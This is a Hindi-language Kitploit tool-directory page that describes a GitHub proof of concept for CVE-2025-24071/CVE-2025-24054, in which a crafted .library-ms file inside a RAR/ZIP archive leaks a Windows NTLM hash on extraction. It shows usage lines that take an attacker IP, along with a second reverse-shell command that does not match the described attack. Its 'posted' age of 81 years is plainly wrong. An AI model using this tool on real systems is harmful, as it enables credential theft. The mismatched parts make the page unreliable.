Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/royall-researchers/cve-2025-24071
टोहीपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करना
GitHubroyall-researchers/cve-2025-24071

CVE-2025-24071

CVE-2025-24071 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो RAR/ZIP अभिलेखागार में तैयार किए गए .library-ms फ़ाइल के माध्यम से NTLM हैश लीक को प्रदर्शित करता है, जो निष्कर्षण पर SMB प्रमाणीकरण को ट्रिगर करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
81 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-24071_PoC

CVE-2025-24071: RAR/ZIP निष्कर्षण और .library-ms फ़ाइल के माध्यम से NTLM हैश लीक

Windows Explorer स्वचालित रूप से SMB प्रमाणीकरण अनुरोध शुरू करता है जब .rar आर्काइव से .library-ms फ़ाइल निकाली जाती है, जिससे NTLM हैश का खुलासा होता है। उपयोगकर्ता को फ़ाइल खोलने या निष्पादित करने की आवश्यकता नहीं है—केवल इसे निकालना ही लीक को ट्रिगर करने के लिए पर्याप्त है।

उपयोग


>>python poc.py

>>enter file name: your file name

>>enter IP: attacker IP
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888

अपडेट:

अपडेट: Microsoft ने अपना CVE नंबर बदल दिया है। Microsoft द्वारा पहले परिभाषित CVE नंबर, CVE-2025-24071, को अपडेट कर CVE-2025-24054 कर दिया गया है।🤷‍♂

टूल डाउनलोड करें